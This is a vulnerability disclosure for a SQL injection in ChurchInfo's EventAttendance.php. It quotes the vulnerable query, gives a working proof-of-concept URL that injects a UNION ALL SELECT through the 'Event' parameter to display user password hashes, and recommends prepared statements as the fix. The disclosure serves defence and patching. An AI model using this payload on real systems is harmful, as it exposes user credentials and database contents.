#245 Vulnerability: SQL Injection in EventAttendance

[huki45q]

Proof of Concept

ChurchInfo does not properly validate and encode a HTTP GET parameter when generating reports (Church Service Attendence). The vulnerability can be found in the file EventAttendance.php:

$sSQL = "SELECT * FROM events_event WHERE event_type = ".$_GET['Event']." ORDER BY event_start";
...
// Get data for the form as it now exists..
$rsOpps = RunQuery($sSQL);
$numRows = mysqli_num_rows($rsOpps);

// Create arrays of the attendees.
for ($row = 1; $row <= $numRows; $row++)
{
    $aRow = mysqli_fetch_assoc($rsOpps);
    extract($aRow);
...

Attack:
The following URL contains malicious code in the GET parameter. If it is requested by an (authenticated) user the response will contain the password hash of a user from the database.

http://localhost/churchinfo/EventAttendance.php?Action=List&Event=3 UNION ALL SELECT usr_Password, usr_Password,usr_Password,usr_Password,usr_Password, usr_Password, usr_Password,usr_Password, usr_Password FROM user_usr&Type=Church Service

The exploit will insert a SQL query using UNION ALL through the GET parameter "Event". After execution, a password hash from the database is displayed on the webpage. Similarly all other database contents can be read by an attacker.

Fix

To fix this bug, use prepared statements for all database queries in order to prevent SQL injections [1].

For example the query could be rewritten as:
$statement = $dbConnection->prepare("SELECT * FROM events_event WHERE event_type = ? ORDER BY event_start");
$statement->bind_param('s', $event_type);
$statement->execute();

References

[1] https://www.owasp.org/index.php/SQL_Injection